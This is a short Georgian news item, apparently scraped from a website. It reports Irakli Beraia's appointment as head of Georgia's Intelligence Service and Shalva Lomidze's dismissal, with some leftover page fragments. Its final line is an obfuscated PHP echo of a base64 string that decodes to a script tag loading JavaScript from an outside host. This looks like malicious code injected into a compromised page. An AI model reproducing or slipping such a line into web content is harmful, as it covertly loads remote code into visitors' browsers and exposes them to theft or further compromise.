celsiusi
ავერსი შნაიდერი

 საქართველოს დაზვერვის სამსახურის უფროსად ირაკლი ბერაია დაინიშნა.

შესაბამისი ბრძანება პრემიერ-მინისტრმა, ირაკლი კობახიძემ უკვე გამოსცა.

ირაკლი ბერაია დღემდე საქართველოს პარლამენტის თავდაცვისა და უშიშროების კომიტეტის თავმჯდომარე იყო. სხვადასხვა დროს ის იკავებდა შინაგან საქმეთა სამინისტროს რეფორმებისა და განვითარების დეპარტამენტის დირექტორის პოზიციას, ასევე იყო სახელმწიფო უსაფრთხოების სამსახურის საინფორმაციო-ანალიტიკური დეპარტამენტის დირექტორი.

შალვა ლომიძე საქართველოს დაზვერვის სამსახურის ხელმძღვანელის თანამდებობიდან გუშინ გათავისუფლდა. ამის შესახებ  პრემიერ-მინისტრის ბრძანება მთავრობის ვებგვერდზე გამოქვეყნდა. 

164
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");